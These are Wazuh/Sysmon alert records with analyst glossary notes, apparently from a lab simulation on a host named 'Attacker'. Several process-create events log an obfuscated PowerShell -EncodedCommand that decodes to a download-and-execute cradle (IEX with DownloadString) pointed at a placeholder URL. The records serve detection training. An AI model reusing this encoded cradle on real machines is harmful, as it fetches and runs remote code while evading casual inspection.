data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd3c-680a-570b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10384 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 64 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534275.1507080 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:53.5659094Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284126 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:53.554
ProcessGuid: {94294ddc-bd3f-680a-590b-000000000e00}
ProcessId: 9020
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_aeouh1r0.rm1.ps1
CreationUtcTime: 2025-04-24 22:37:53.551
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:53.554 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd3f-680a-590b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9020 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_aeouh1r0.rm1.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:53.551 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 61 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534277.1509845 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:54.9897371Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284143 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:54.445
ProcessGuid: {94294ddc-bd42-680a-5b0b-000000000e00}
ProcessId: 5944
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd3f-680a-590b-000000000e00}
ParentProcessId: 9020
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:54.445 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd42-680a-5b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 5944 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd3f-680a-590b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9020 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 65 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534277.1517908 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:55.3537134Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284144 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:55.314
ProcessGuid: {94294ddc-bd42-680a-5b0b-000000000e00}
ProcessId: 5944
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ibqrrzzz.zs1.ps1
CreationUtcTime: 2025-04-24 22:37:55.314
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:55.314 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd42-680a-5b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 5944 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ibqrrzzz.zs1.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:55.314 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 62 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534280.1520673 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:58.3360432Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284163 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:56.657
ProcessGuid: {94294ddc-bd44-680a-5d0b-000000000e00}
ProcessId: 5188
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd42-680a-5b0b-000000000e00}
ParentProcessId: 5944
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:56.657 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd44-680a-5d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 5188 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd42-680a-5b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 5944 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 66 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534281.1528736 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:58.5451085Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284164 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
